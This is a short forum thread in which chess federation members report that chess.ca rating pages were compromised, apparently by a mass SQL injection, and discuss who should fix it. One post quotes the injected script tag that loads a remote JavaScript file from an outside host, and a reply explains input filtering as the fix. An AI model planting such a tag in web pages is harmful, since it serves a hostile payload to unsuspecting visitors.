I suspect that the chess.ca was corrupted again. Webpages with an information about players' ratings tries to execute a script
Who is responsible to overlook the webpage? ED?Code:<script src=http://f1y.in/j.js></script>
CFC Voting Member
chess.ca corrupt again?
I suspect that the chess.ca was corrupted again. Webpages with an information about players' ratings tries to execute a script
Who is responsible to overlook the webpage? ED?Code:<script src=http://f1y.in/j.js></script>
CFC Executive Director
Who do you call ?
I would send an email to the ED! If they're not aware of the problem, how can they fix it.Originally Posted by Egidijus Zeromskis
I checked my rating, and I did not encounter any problems (other than it's too low LOL), but I forwarded your message to Gerry at info@chess.ca anyway to be safe.
Pawn
Chess.ca corrupt again?
Hi Bob,
This office is aware of the issue - Eric had already sent a note to Gerry on this.
Empty Square
SQL injection
It is the result of a SQL injection attack. Here's a little information about it:
http://blog.trendmicro.com/massive-s...ection-ensues/
http://isc.sans.org/diary.html?storyid=6811
Do not click on the link that shows up (hxxp://f1y.in/j.js) as it appears to lead to something nasty (I've deliberately messed up the url replacing http with hxxp to prevent anyone from accidentally clicking on the link).
Ideally all web form data (like where you enter your surname to get your rating) should be filtered to prevent SQL injections. Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.
Administrator
This... despite most major systems having built-in code to prevent this, many people don't bother using it, and MUCH worse, quite a few web development books DON'T TELL YOU TO!
I'm not familiar with ASP in particular but usually it's some variation of Escape("string goes here");
Pawn
damn script kiddies...
Posting Permissions
Reply With Quote